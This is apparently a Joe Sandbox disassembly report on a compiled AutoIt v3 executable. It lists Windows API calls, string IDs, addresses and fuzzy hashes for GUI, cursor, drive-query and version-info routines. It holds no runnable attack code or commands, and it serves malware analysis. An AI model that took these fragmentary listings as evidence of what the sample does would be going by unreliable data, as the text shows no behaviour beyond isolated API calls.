                                                      • Instruction ID: d81c9b2c133d45d49eb8750e689fd85bc314d935b9141447e44fcbff555bb377
                                                      • Opcode Fuzzy Hash: 8326bfc5a4085384f24a2a65c394cb156a931c8f893fc8640af16ebf63825337
                                                      • Instruction Fuzzy Hash: F7A18072008385AFD710DFA5DC48A6B7BA9FF98321F104B29F9629A1A1D730E945CB52
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?), ref: 00A62CA2
                                                      • DeleteObject.GDI32(00000000), ref: 00A62CE8
                                                      • DeleteObject.GDI32(00000000), ref: 00A62CF3
                                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 00A62CFE
                                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 00A62D09
                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00A9C68B
                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00A9C6C4
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A9CAED
                                                        • Part of subcall function 00A61B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A62036,?,00000000,?,?,?,?,00A616CB,00000000,?), ref: 00A61B9A
                                                      • SendMessageW.USER32(?,00001053), ref: 00A9CB2A
                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00A9CB41
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00A9CB57
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00A9CB62
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                      • String ID: 0
                                                      • API String ID: 464785882-4108050209
                                                      • Opcode ID: 695264db8d3e8608e18c9cabe6c686d6a88351d4b171f383560321d87a1b3082
                                                      • Instruction ID: e61060f2789e8026e82955e26e5728e9bb6138f39bbec9145580645e6109560b
                                                      • Opcode Fuzzy Hash: 695264db8d3e8608e18c9cabe6c686d6a88351d4b171f383560321d87a1b3082
                                                      • Instruction Fuzzy Hash: E2128B30600A41EFDB20CF24C988BA9BBF5FF45320F548569E995DB662CB31EC42CB91
                                                      APIs
                                                      • DestroyWindow.USER32(00000000), ref: 00AD77F1
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00AD78B0
                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00AD78EE
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00AD7900
                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00AD7946
                                                      • GetClientRect.USER32(00000000,?), ref: 00AD7952
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00AD7996
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AD79A5
                                                      • GetStockObject.GDI32(00000011), ref: 00AD79B5
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00AD79B9
                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00AD79C9
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AD79D2
                                                      • DeleteDC.GDI32(00000000), ref: 00AD79DB
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00AD7A07
                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00AD7A1E
                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00AD7A59
                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00AD7A6D
                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00AD7A7E
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00AD7AAE
                                                      • GetStockObject.GDI32(00000011), ref: 00AD7AB9
                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00AD7AC4
                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00AD7ACE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                      • API String ID: 2910397461-517079104
                                                      • Opcode ID: dc4e022d9759f81cf435bdab2d36165b305bfeb6aa8463cc98d319b367a78840
                                                      • Instruction ID: bd14101d211deeb73ec507665fbf9528495b6f787a56ebdf68b4414ba312b04f
                                                      • Opcode Fuzzy Hash: dc4e022d9759f81cf435bdab2d36165b305bfeb6aa8463cc98d319b367a78840
                                                      • Instruction Fuzzy Hash: 2FA16471A41219BFEB14DBA4DD4AFAF7BB9EB48710F104115FA15AB2E0DB70AD01CB60
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00ACAF89
                                                      • GetDriveTypeW.KERNEL32(?,00AEFAC0,?,\\.\,00AEF910), ref: 00ACB066
                                                      • SetErrorMode.KERNEL32(00000000,00AEFAC0,?,\\.\,00AEF910), ref: 00ACB1C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                      • API String ID: 2907320926-4222207086
                                                      • Opcode ID: 85fa1ba27f283e16eeb36ae34f9178fc4250e770da45c83085efbffda26c2b79
                                                      • Instruction ID: c837f53ff72511bd24cbc342bb249eddb926a89eb2c76726ae19cca6e399f554
                                                      • Opcode Fuzzy Hash: 85fa1ba27f283e16eeb36ae34f9178fc4250e770da45c83085efbffda26c2b79
                                                      • Instruction Fuzzy Hash: 5551A630A91345AFCB00DB50CAA3EBD73F0AB14742F69415DE40AA71E1C736AE81DB62
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 1038674560-86951937
                                                      • Opcode ID: 81b3547aa4d3d785b6832831ab10d4adb0f81a85538491a778c8c93a4a844017
                                                      • Instruction ID: 902310a7ba40c2d509ac5420e6f4f92ee5b50306ab78a1468b28288b53f8d17f
                                                      • Opcode Fuzzy Hash: 81b3547aa4d3d785b6832831ab10d4adb0f81a85538491a778c8c93a4a844017
                                                      • Instruction Fuzzy Hash: 7F81F671B40245FBCF24FBA0CE92FAE77B8AF15740F044025F945AA1D2EB61EA51C7A1
                                                      APIs
                                                      • GetSysColor.USER32(00000012), ref: 00AEAB99
                                                      • SetTextColor.GDI32(?,?), ref: 00AEAB9D
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00AEABB3
                                                      • GetSysColor.USER32(0000000F), ref: 00AEABBE
                                                      • CreateSolidBrush.GDI32(?), ref: 00AEABC3
                                                      • GetSysColor.USER32(00000011), ref: 00AEABDB
                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AEABE9
                                                      • SelectObject.GDI32(?,00000000), ref: 00AEABFA
                                                      • SetBkColor.GDI32(?,00000000), ref: 00AEAC03
                                                      • SelectObject.GDI32(?,?), ref: 00AEAC10
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00AEAC2F
                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AEAC46
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00AEAC5B
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AEACA7
                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00AEACCE
                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00AEACEC
                                                      • DrawFocusRect.USER32(?,?), ref: 00AEACF7
                                                      • GetSysColor.USER32(00000011), ref: 00AEAD05
                                                      • SetTextColor.GDI32(?,00000000), ref: 00AEAD0D
                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00AEAD21
                                                      • SelectObject.GDI32(?,00AEA869), ref: 00AEAD38
                                                      • DeleteObject.GDI32(?), ref: 00AEAD43
                                                      • SelectObject.GDI32(?,?), ref: 00AEAD49
                                                      • DeleteObject.GDI32(?), ref: 00AEAD4E
                                                      • SetTextColor.GDI32(?,?), ref: 00AEAD54
                                                      • SetBkColor.GDI32(?,?), ref: 00AEAD5E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 1996641542-0
                                                      • Opcode ID: 55397adcb626496b6bba41b40a30c08f711e7a39a537b6dc690225007de62b54
                                                      • Instruction ID: ec3f7fa081d2df98057eab210e5d3b54aabf488de579c586cf5da07f2f5aac7d
                                                      • Opcode Fuzzy Hash: 55397adcb626496b6bba41b40a30c08f711e7a39a537b6dc690225007de62b54
                                                      • Instruction Fuzzy Hash: C2615F71900258EFDF11DFE9DC88EAE7B79EB48320F208225F915AB2A1D7719D41DB90
                                                      APIs
                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00AE8D34
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AE8D45
                                                      • CharNextW.USER32(0000014E), ref: 00AE8D74
                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00AE8DB5
                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00AE8DCB
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AE8DDC
                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00AE8DF9
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00AE8E45
                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00AE8E5B
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AE8E8C
                                                      • _memset.LIBCMT ref: 00AE8EB1
                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00AE8EFA
                                                      • _memset.LIBCMT ref: 00AE8F59
                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00AE8F83
                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00AE8FDB
                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00AE9088
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00AE90AA
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AE90F4
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AE9121
                                                      • DrawMenuBar.USER32(?), ref: 00AE9130
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00AE9158
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                      • String ID: 0
                                                      • API String ID: 1073566785-4108050209
                                                      • Opcode ID: 45c1beb3eac8906ece75d22173b37e798974af8678ce1586c3e7167573090b1b
                                                      • Instruction ID: 8a9b0865b75ecb47d58cb1f8e774577e79119c928fa054697eea494a26c546d0
                                                      • Opcode Fuzzy Hash: 45c1beb3eac8906ece75d22173b37e798974af8678ce1586c3e7167573090b1b
                                                      • Instruction Fuzzy Hash: 51E18370900299AFDF20DF66CC88EEF7BB9EF05710F108155F919AA290DB749A81DF61
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00AE4C51
                                                      • GetDesktopWindow.USER32 ref: 00AE4C66
                                                      • GetWindowRect.USER32(00000000), ref: 00AE4C6D
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00AE4CCF
                                                      • DestroyWindow.USER32(?), ref: 00AE4CFB
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00AE4D24
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AE4D42
                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00AE4D68
                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00AE4D7D
                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00AE4D90
                                                      • IsWindowVisible.USER32(?), ref: 00AE4DB0
                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00AE4DCB
                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00AE4DDF
                                                      • GetWindowRect.USER32(?,?), ref: 00AE4DF7
                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00AE4E1D
                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00AE4E37
                                                      • CopyRect.USER32(?,?), ref: 00AE4E4E
                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00AE4EB9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                      • String ID: ($0$tooltips_class32
                                                      • API String ID: 698492251-4156429822
                                                      • Opcode ID: 05d3db28a0a7021cb447e8a014d1d73903aeed8e60e36f36b2da147a45895f45
                                                      • Instruction ID: 5123e66e144a2679875d4cc1052b0561205f211066d6972bfcb06129a7c214d6
                                                      • Opcode Fuzzy Hash: 05d3db28a0a7021cb447e8a014d1d73903aeed8e60e36f36b2da147a45895f45
                                                      • Instruction Fuzzy Hash: 4DB15971608381AFDB04DF65C989B6ABBE9FF88314F00891CF5999B2A1D771EC05CB91
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00AC46E8
                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00AC470E
                                                      • _wcscpy.LIBCMT ref: 00AC473C
                                                      • _wcscmp.LIBCMT ref: 00AC4747
                                                      • _wcscat.LIBCMT ref: 00AC475D
                                                      • _wcsstr.LIBCMT ref: 00AC4768
                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00AC4784
                                                      • _wcscat.LIBCMT ref: 00AC47CD
                                                      • _wcscat.LIBCMT ref: 00AC47D4
                                                      • _wcsncpy.LIBCMT ref: 00AC47FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                      • API String ID: 699586101-1459072770
                                                      • Opcode ID: f7f6067dfd9e36b2bed4104b471bc163eb53da11599703e74ff775124e8d44a9
                                                      • Instruction ID: f918d37f723e7df67a907b7a4426e2a884d2a2196b139ec62b8afa54d0bcf8ff
                                                      • Opcode Fuzzy Hash: f7f6067dfd9e36b2bed4104b471bc163eb53da11599703e74ff775124e8d44a9
                                                      • Instruction Fuzzy Hash: E241F572A042107BDB10B7748D42FBF77BCEF45710F04406AF904A6182EB75AA0197A9
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A628BC
                                                      • GetSystemMetrics.USER32(00000007), ref: 00A628C4
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A628EF
                                                      • GetSystemMetrics.USER32(00000008), ref: 00A628F7
                                                      • GetSystemMetrics.USER32(00000004), ref: 00A6291C
                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A62939
                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A62949
                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A6297C
                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A62990
                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00A629AE
                                                      • GetStockObject.GDI32(00000011), ref: 00A629CA
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A629D5
                                                        • Part of subcall function 00A62344: GetCursorPos.USER32(?), ref: 00A62357
                                                        • Part of subcall function 00A62344: ScreenToClient.USER32(00B267B0,?), ref: 00A62374
                                                        • Part of subcall function 00A62344: GetAsyncKeyState.USER32(00000001), ref: 00A62399
                                                        • Part of subcall function 00A62344: GetAsyncKeyState.USER32(00000002), ref: 00A623A7
                                                      • SetTimer.USER32(00000000,00000000,00000028,00A61256), ref: 00A629FC
                                                      Strings
                                                      Similarity
                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                      • String ID: AutoIt v3 GUI
                                                      • API String ID: 1458621304-248962490
                                                      • Opcode ID: 49d7f910e67959c341854fdf5139b68ca5bc9a50c6d61c5269f94b949173cae2
                                                      • Instruction ID: c80abd56c4df85f51f6773e7f68d23e58c9d652901e82ca50e17abad0109fecb
                                                      • Opcode Fuzzy Hash: 49d7f910e67959c341854fdf5139b68ca5bc9a50c6d61c5269f94b949173cae2
                                                      • Instruction Fuzzy Hash: 22B18171A0064AEFDF14DFA8DD85BAE7BB4FB18314F108129FA15EB2A0DB749941CB50
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00AE40F6
                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00AE41B6
                                                      Strings
                                                      Similarity
                                                      • API ID: BuffCharMessageSendUpper
                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                      • API String ID: 3974292440-719923060
                                                      • Opcode ID: 0236947d0acc40b7f3ba83ffe04c63f907cc7c39989747d4c3c0054be4093376
                                                      • Instruction ID: 58e9a357cec98e3a9234ba612ae81d8fb1962eb12f955b9d827b5f8d96b53934
                                                      • Opcode Fuzzy Hash: 0236947d0acc40b7f3ba83ffe04c63f907cc7c39989747d4c3c0054be4093376
                                                      • Instruction Fuzzy Hash: 65A15F302143429FCB14EF61CA51EAAB7FABF98314F14496CB8969B792DB30ED05CB51
                                                      APIs
                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00AD5309
                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00AD5314
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00AD531F
                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00AD532A
                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00AD5335
                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00AD5340
                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00AD534B
                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00AD5356
                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00AD5361
                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00AD536C
                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00AD5377
                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00AD5382
                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00AD538D
                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00AD5398
                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00AD53A3
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00AD53AE
                                                      • GetCursorInfo.USER32(?), ref: 00AD53BE
                                                      • GetLastError.KERNEL32(00000001,00000000), ref: 00AD53E9
                                                      Similarity
                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                      • String ID:
                                                      • API String ID: 3215588206-0
                                                      • Opcode ID: 4f8bc3bb012f400ed3f39ec6f19c2a3e08ec5730e9d04bd11dd263f9e97ca4c0
                                                      • Instruction ID: 0b566664809a44142638384d505744da3d7823525e6db64d6d4ea7f37a568e38
                                                      • Opcode Fuzzy Hash: 4f8bc3bb012f400ed3f39ec6f19c2a3e08ec5730e9d04bd11dd263f9e97ca4c0
                                                      • Instruction Fuzzy Hash: 26415170E04319AADB109FBA8C4996FFFF8EF51B50B10452FE509E7291DAB8A5018E61
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00ABAAA5
                                                      • __swprintf.LIBCMT ref: 00ABAB46
                                                      • _wcscmp.LIBCMT ref: 00ABAB59
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00ABABAE
                                                      • _wcscmp.LIBCMT ref: 00ABABEA
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00ABAC21
                                                      • GetDlgCtrlID.USER32(?), ref: 00ABAC73
                                                      • GetWindowRect.USER32(?,?), ref: 00ABACA9
                                                      • GetParent.USER32(?), ref: 00ABACC7
                                                      • ScreenToClient.USER32(00000000), ref: 00ABACCE
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00ABAD48
                                                      • _wcscmp.LIBCMT ref: 00ABAD5C
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00ABAD82
                                                      • _wcscmp.LIBCMT ref: 00ABAD96
                                                        • Part of subcall function 00A8386C: _iswctype.LIBCMT ref: 00A83874
                                                      Strings
                                                      Similarity
                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                      • String ID: %s%u
                                                      • API String ID: 3744389584-679674701
                                                      • Opcode ID: e883cd043447b23f2d0d63d373127f8c277c840f39643bcf2b1fe5498bbdd218
                                                      • Instruction ID: 9b62cee6d4491c299a57ee68cd6890d4ef2eebfd5eba210b50c4aeace451d993
                                                      • Opcode Fuzzy Hash: e883cd043447b23f2d0d63d373127f8c277c840f39643bcf2b1fe5498bbdd218
                                                      • Instruction Fuzzy Hash: A1A1CF71204246AFDB14DF64C884BEABBECFF14355F108629F9A9C2192D730E955CB92
                                                      APIs
                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 00ABB3DB
                                                      • _wcscmp.LIBCMT ref: 00ABB3EC
                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 00ABB414
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00ABB431
                                                      • _wcscmp.LIBCMT ref: 00ABB44F
                                                      • _wcsstr.LIBCMT ref: 00ABB460
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00ABB498
                                                      • _wcscmp.LIBCMT ref: 00ABB4A8
                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 00ABB4CF
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00ABB518
                                                      • _wcscmp.LIBCMT ref: 00ABB528
                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 00ABB550
                                                      • GetWindowRect.USER32(00000004,?), ref: 00ABB5B9
                                                      Strings
                                                      Similarity
                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                      • String ID: @$ThumbnailClass
                                                      • API String ID: 1788623398-1539354611
